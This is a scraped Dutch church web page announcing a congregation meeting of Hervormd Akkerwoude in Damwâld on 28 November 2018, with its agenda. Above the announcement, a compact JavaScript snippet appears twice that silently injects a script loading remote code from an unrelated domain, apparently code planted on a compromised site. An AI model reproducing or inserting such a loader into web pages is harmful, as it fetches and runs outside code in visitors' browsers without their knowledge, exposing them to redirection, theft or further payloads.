;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Gemeenteavond Hervormd Akkerwoude - PKN Damwâld

Gemeenteavond Hervormd Akkerwoude

Gepubliceerd op: maandag 19 november 2018

De kerkenraad nodigt alle gemeenteleden uit voor een gemeenteavond D.V. op woensdag 28 november 2018 in ’t Skûlplak aan de Bûterblom 8 in Damwâld. Aanvang is 19.30 uur. Een aantal belangrijke zaken zullen deze avond aan de orde komen. Uiteraard zullen de voorzitters van de diverse colleges met u/jou terugblikken op het afgelopen jaar en vertellen wat de plannen zijn voor de komende periode. Ook zullen we ingaan op een aantal actuele ontwikkelingen en willen we graag een ieders mening peilen in de opmaat naar een nieuw beleidsplan.
Een uitstekende gelegenheid dus om met elkaar in gesprek te gaan over het reilen en zeilen in onze gemeente. Alle leden – met name onze jongeren – zijn van harte uitgenodigd!

Agenda
1. Opening
2. Verslag gemeenteavond 21 november 2017
3. Presentatie colleges
4. Pauze
5. Actuele ontwikkelingen
6. In de opmaat naar een nieuw Beleidsplan
7. Rondvraag
8. Sluiting